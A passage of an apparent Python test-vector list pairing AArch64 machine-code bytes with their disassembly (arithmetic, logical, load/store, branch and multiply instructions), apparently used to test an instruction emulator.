("\xe1\xff\x9f\xd2", "movz x1, #0xffff"),
("\x22\x00\x80\xd2", "movz x2, #0x1"),
("\x20\x28\xc2\x9a", "asr x0, x1, x2"),
("\x42\x00\x80\xd2", "movz x2, #0x2"),
("\x20\x28\xc2\x9a", "asr x0, x1, x2"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\xcb", "sub x0, x1, w2, sxtb"),
("\x20\xa0\x22\xcb", "sub x0, x1, w2, sxth"),
("\x20\xc0\x22\xcb", "sub x0, x1, w2, sxtw"),
("\x20\xe0\x22\xcb", "sub x0, x1, x2, sxtx"),
("\x20\x00\x02\xcb", "sub x0, x1, x2, lsl #0"),
("\x20\x04\x02\xcb", "sub x0, x1, x2, lsl #1"),
("\x20\x20\x02\xcb", "sub x0, x1, x2, lsl #8"),
("\x20\x40\x02\xcb", "sub x0, x1, x2, lsl #16"),
("\x20\x80\x02\xcb", "sub x0, x1, x2, lsl #32"),
("\x20\x84\x02\xcb", "sub x0, x1, x2, lsl #33"),
("\x20\x88\x02\xcb", "sub x0, x1, x2, lsl #34"),
("\x20\x00\x42\xcb", "sub x0, x1, x2, lsr #0"),
("\x20\x04\x42\xcb", "sub x0, x1, x2, lsr #1"),
("\x20\x20\x42\xcb", "sub x0, x1, x2, lsr #8"),
("\x20\x40\x42\xcb", "sub x0, x1, x2, lsr #16"),
("\x20\x80\x42\xcb", "sub x0, x1, x2, lsr #32"),
("\x20\x84\x42\xcb", "sub x0, x1, x2, lsr #33"),
("\x20\x88\x42\xcb", "sub x0, x1, x2, lsr #34"),
("\x20\x20\x82\xcb", "sub x0, x1, x2, asr #8"),
("\x20\x40\x82\xcb", "sub x0, x1, x2, asr #16"),
("\x20\x80\x82\xcb", "sub x0, x1, x2, asr #32"),
("\x20\x84\x82\xcb", "sub x0, x1, x2, asr #33"),
("\x20\x88\x82\xcb", "sub x0, x1, x2, asr #34"),
("\x20\x88\x82\xcb", "sub x0, x1, x2, asr #34"),
("\x20\x88\x19\xd1", "sub x0, x1, #1634"),
("\x20\x58\x21\xd1", "sub x0, x1, #2134"),
("\x20\x58\x61\xd1", "sub x0, x1, #2134, lsl #12"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\xeb", "subs x0, x1, w2, sxtb"),
("\x20\xa0\x22\xeb", "subs x0, x1, w2, sxth"),
("\x20\xc0\x22\xeb", "subs x0, x1, w2, sxtw"),
("\x20\xe0\x22\xeb", "subs x0, x1, x2, sxtx"),
("\x20\x00\x02\xeb", "subs x0, x1, x2, lsl #0"),
("\x20\x04\x02\xeb", "subs x0, x1, x2, lsl #1"),
("\x20\x20\x02\xeb", "subs x0, x1, x2, lsl #8"),
("\x20\x40\x02\xeb", "subs x0, x1, x2, lsl #16"),
("\x20\x80\x02\xeb", "subs x0, x1, x2, lsl #32"),
("\x20\x84\x02\xeb", "subs x0, x1, x2, lsl #33"),
("\x20\x88\x02\xeb", "subs x0, x1, x2, lsl #34"),
("\x20\x00\x42\xeb", "subs x0, x1, x2, lsr #0"),
("\x20\x04\x42\xeb", "subs x0, x1, x2, lsr #1"),
("\x20\x20\x42\xeb", "subs x0, x1, x2, lsr #8"),
("\x20\x40\x42\xeb", "subs x0, x1, x2, lsr #16"),
("\x20\x80\x42\xeb", "subs x0, x1, x2, lsr #32"),
("\x20\x84\x42\xeb", "subs x0, x1, x2, lsr #33"),
("\x20\x88\x42\xeb", "subs x0, x1, x2, lsr #34"),
("\x20\x20\x82\xeb", "subs x0, x1, x2, asr #8"),
("\x20\x40\x82\xeb", "subs x0, x1, x2, asr #16"),
("\x20\x80\x82\xeb", "subs x0, x1, x2, asr #32"),
("\x20\x84\x82\xeb", "subs x0, x1, x2, asr #33"),
("\x20\x88\x82\xeb", "subs x0, x1, x2, asr #34"),
("\x20\x88\x82\xeb", "subs x0, x1, x2, asr #34"),
("\x20\x88\x19\xf1", "subs x0, x1, #1634"),
("\x20\x58\x21\xf1", "subs x0, x1, #2134"),
("\x20\x58\x61\xf1", "subs x0, x1, #2134, lsl #12"),
("\x20\x00\x02\xca", "eor x0, x1, x2, lsl #0"),
("\x20\x04\x02\xca", "eor x0, x1, x2, lsl #1"),
("\x20\x20\x02\xca", "eor x0, x1, x2, lsl #8"),
("\x20\x40\x02\xca", "eor x0, x1, x2, lsl #16"),
("\x20\x80\x02\xca", "eor x0, x1, x2, lsl #32"),
("\x20\x84\x02\xca", "eor x0, x1, x2, lsl #33"),
("\x20\x88\x02\xca", "eor x0, x1, x2, lsl #34"),
("\x20\x00\x42\xca", "eor x0, x1, x2, lsr #0"),
("\x20\x04\x42\xca", "eor x0, x1, x2, lsr #1"),
("\x20\x20\x42\xca", "eor x0, x1, x2, lsr #8"),
("\x20\x40\x42\xca", "eor x0, x1, x2, lsr #16"),
("\x20\x80\x42\xca", "eor x0, x1, x2, lsr #32"),
("\x20\x84\x42\xca", "eor x0, x1, x2, lsr #33"),
("\x20\x88\x42\xca", "eor x0, x1, x2, lsr #34"),
("\x20\x20\x82\xca", "eor x0, x1, x2, asr #8"),
("\x20\x40\x82\xca", "eor x0, x1, x2, asr #16"),
("\x20\x80\x82\xca", "eor x0, x1, x2, asr #32"),
("\x20\x84\x82\xca", "eor x0, x1, x2, asr #33"),
("\x20\x88\x82\xca", "eor x0, x1, x2, asr #34"),
("\x20\x88\x82\xca", "eor x0, x1, x2, asr #34"),
("\x20\x1c\x40\xd2", "eor x0, x1, #255"),
("\x20\x18\x40\xd2", "eor x0, x1, #0x7f"),
("\x20\x00\x40\xd2", "eor x0, x1, #1"),
("\x20\x00\x22\xca", "eon x0, x1, x2, lsl #0"),
("\x20\x04\x22\xca", "eon x0, x1, x2, lsl #1"),
("\x20\x20\x22\xca", "eon x0, x1, x2, lsl #8"),
("\x20\x40\x22\xca", "eon x0, x1, x2, lsl #16"),
("\x20\x80\x22\xca", "eon x0, x1, x2, lsl #32"),
("\x20\x84\x22\xca", "eon x0, x1, x2, lsl #33"),
("\x20\x88\x22\xca", "eon x0, x1, x2, lsl #34"),
("\x20\x00\x62\xca", "eon x0, x1, x2, lsr #0"),
("\x20\x04\x62\xca", "eon x0, x1, x2, lsr #1"),
("\x20\x20\x62\xca", "eon x0, x1, x2, lsr #8"),
("\x20\x40\x62\xca", "eon x0, x1, x2, lsr #16"),
("\x20\x80\x62\xca", "eon x0, x1, x2, lsr #32"),
("\x20\x84\x62\xca", "eon x0, x1, x2, lsr #33"),
("\x20\x88\x62\xca", "eon x0, x1, x2, lsr #34"),
("\x20\x20\xa2\xca", "eon x0, x1, x2, asr #8"),
("\x20\x40\xa2\xca", "eon x0, x1, x2, asr #16"),
("\x20\x80\xa2\xca", "eon x0, x1, x2, asr #32"),
("\x20\x84\xa2\xca", "eon x0, x1, x2, asr #33"),
("\x20\x88\xa2\xca", "eon x0, x1, x2, asr #34"),
("\x20\x88\xa2\xca", "eon x0, x1, x2, asr #34"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x00\x22\xaa", "orn x0, x1, x2"),
("\x40\x00\x21\xaa", "orn x0, x2, x1"),
("\x41\x00\x20\xaa", "orn x1, x2, x0"),
("\x01\x00\x22\xaa", "orn x1, x0, x2"),
("\x20\x04\x22\xaa", "orn x0, x1, x2, lsl #1"),
("\x20\x08\x22\xaa", "orn x0, x1, x2, lsl #2"),
("\x20\x0c\x22\xaa", "orn x0, x1, x2, lsl #3"),
("\x20\x04\xe2\xaa", "orn x0, x1, x2, ror #1"),
("\x20\x08\xe2\xaa", "orn x0, x1, x2, ror #2"),
("\x20\x0c\xe2\xaa", "orn x0, x1, x2, ror #3"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x00\x02\xaa", "orr x0, x1, x2"),
("\x40\x00\x01\xaa", "orr x0, x2, x1"),
("\x41\x00\x00\xaa", "orr x1, x2, x0"),
("\x01\x00\x02\xaa", "orr x1, x0, x2"),
("\x20\x04\x02\xaa", "orr x0, x1, x2, lsl #1"),
("\x20\x08\x02\xaa", "orr x0, x1, x2, lsl #2"),
("\x20\x0c\x02\xaa", "orr x0, x1, x2, lsl #3"),
("\x20\x04\xc2\xaa", "orr x0, x1, x2, ror #1"),
("\x20\x08\xc2\xaa", "orr x0, x1, x2, ror #2"),
("\x20\x0c\xc2\xaa", "orr x0, x1, x2, ror #3"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\xf9", "ldr x5, [x1]"),
("\x26\x04\x40\xf8", "ldr x6, [x1], #0"),
("\x27\x44\x40\xf8", "ldr x7, [x1], #4"),
("\x28\x68\x62\xf8", "ldr x8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\xf8", "ldr x9, [x1], #-30"),
("\x2a\x8c\x40\xf8", "ldr x10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\xf9", "ldr x11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\x39", "ldrb w5, [x1]"),
("\x26\x04\x40\x38", "ldrb w6, [x1], #0"),
("\x27\x44\x40\x38", "ldrb w7, [x1], #4"),
("\x28\x68\x62\x38", "ldrb w8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\x38", "ldrb w9, [x1], #-30"),
("\x2a\x8c\x40\x38", "ldrb w10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\x39", "ldrb w11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\x79", "ldrh w5, [x1]"),
("\x26\x04\x40\x78", "ldrh w6, [x1], #0"),
("\x27\x44\x40\x78", "ldrh w7, [x1], #4"),
("\x28\x68\x62\x78", "ldrh w8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\x78", "ldrh w9, [x1], #-30"),
("\x2a\x8c\x40\x78", "ldrh w10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\x79", "ldrh w11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x24\x14\x40\xa9", "ldp x4, x5, [x1]"),
("\x25\x18\xc0\xa8", "ldp x5, x6, [x1], #0"),
("\x26\x9c\xc0\xa8", "ldp x6, x7, [x1], #8"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x28\x24\xfe\xa8", "ldp x8, x9, [x1], #-32"),
("\x29\x28\xc1\xa9", "ldp x9, x10, [x1, #16]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xea\x2f\x40\xa9", "ldp x10, x11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x24\x14\x40\x29", "ldp w4, w5, [x1]"),
("\x25\x18\xc0\x28", "ldp w5, w6, [x1], #0"),
("\x26\x1c\xc1\x28", "ldp w6, w7, [x1], #8"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x28\x24\xfc\x28", "ldp w8, w9, [x1], #-32"),
("\x29\x28\xc2\x29", "ldp w9, w10, [x1, #16]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xea\x2f\x40\x29", "ldp w10, w11, [sp]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\xf8", "ldur x0, [x1, #1]"),
("\x20\x20\x40\xf8", "ldur x0, [x1, #2]"),
("\x20\x30\x40\xf8", "ldur x0, [x1, #3]"),
("\x20\x40\x40\xf8", "ldur x0, [x1, #4]"),
("\x20\xf0\x5f\xf8", "ldur x0, [x1, #-1]"),
("\x20\xe0\x5f\xf8", "ldur x0, [x1, #-2]"),
("\x20\xd0\x5f\xf8", "ldur x0, [x1, #-3]"),
("\x20\xc0\x5f\xf8", "ldur x0, [x1, #-4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x40\x38", "ldurb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\x38", "ldurb w0, [x1, #1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x20\x40\x38", "ldurb w0, [x1, #2]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x30\x40\x38", "ldurb w0, [x1, #3]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x40\x40\x38", "ldurb w0, [x1, #4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xf0\x5f\x38", "ldurb w0, [x1, #0xffffffffffffffff]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xe0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffe]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xd0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffd]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xc0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffc]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x40\x78", "ldurh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\x78", "ldurh w0, [x1, #1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x20\x40\x78", "ldurh w0, [x1, #2]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x30\x40\x78", "ldurh w0, [x1, #3]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x40\x40\x78", "ldurh w0, [x1, #4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xf0\x5f\x78", "ldurh w0, [x1, #0xffffffffffffffff]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xe0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffe]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xd0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffd]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xc0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffc]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x38", "ldursb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x78", "ldursh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x78", "ldursh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb8", "ldursw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x38", "ldursb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x78", "ldursh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x78", "ldursh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb8", "ldursw x0, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x39", "ldrsb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x79", "ldrsh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x79", "ldrsh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb9", "ldrsw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x39", "ldrsb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x79", "ldrsh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x79", "ldrsh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb9", "ldrsw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x06\xa0\xd2", "movz x2, #0x30, lsl #16"), # HEAP address
("\x42\x78\x00\x91", "add x2, x2, #30"),
("\x23\x00\x40\xf8", "ldur x3, [x1]"),
("\x44\x00\x40\xf8", "ldur x4, [x2]"),
("\x60\x00\xc4\x93", "extr x0, x3, x4, #0"),
("\x60\x04\xc4\x93", "extr x0, x3, x4, #1"),
("\x60\x08\xc4\x93", "extr x0, x3, x4, #2"),
("\x60\x0c\xc4\x93", "extr x0, x3, x4, #2"),
("\x60\x78\xc4\x93", "extr x0, x3, x4, #30"),
("\x60\xfc\xc4\x93", "extr x0, x3, x4, #63"),
("\x60\x00\x84\x13", "extr w0, w3, w4, #0"),
("\x60\x04\x84\x13", "extr w0, w3, w4, #1"),
("\x60\x08\x84\x13", "extr w0, w3, w4, #2"),
("\x60\x0c\x84\x13", "extr w0, w3, w4, #3"),
("\x60\x7c\x84\x13", "extr w0, w3, w4, #31"),
("\x01\x00\x00\x14", "b #4"),
#("\x02\x00\x00\x14", "b #8"), # FIXME cannot handle this with
#("\x03\x00\x00\x14", "b #12"), # unicorn emulating only one
#("\x00\xd0\x48\x14", "b #0x1234000"), # instruction...
#("\x74\xbb\xff\x17", "b #-0x11230"), #
("\x20\x00\x00\x54" ,"b.eq #4"),
#("\x40\x00\x00\x54" ,"b.eq #8"),
("\x01\x00\x00\x94" ,"bl #4"),
("\x80\x0c\x90\xb7", "tbnz x0, #0x32, #0x190"),
("\x20\x00\x90\xb6", "tbz x0, #0x32, #4"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x06\xa0\xd2", "movz x2, #0x20, lsl #16"), # STACK address
("\xe1\x03\x02\xaa", "mov x1, x2"),
("\x3f\x00\x00\x91", "mov sp, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xe0\x03\x21\xaa", "mvn x0, x1"),
("\xe0\x03\x01\xcb", "neg x0, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x0c\x02\x9b", "madd x0, x1, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x7c\x02\x9b", "mul x0, x1, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x8c\x02\x9b", "msub x0, x1, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\xfc\x02\x9b", "mneg x0, x1, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x64\xa0\x84\xd2", "movz x4, #9475"),
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x2b\xf8\x80\xd2", "movz x11, #1985"),
("\x25\x00\x00\xf9", "str x5, [x1]"),
("\x26\x04\x00\xf8", "str x6, [x1], #0"),
("\x27\x44\x00\xf8", "str x7, [x1], #4"),
("\x28\x68\x22\xf8", "str x8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x1e\xf8", "str x9, [x1], #-30"),
("\x2a\x8c\x00\xf8", "str x10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x00\xf9", "str x11, [sp]"),
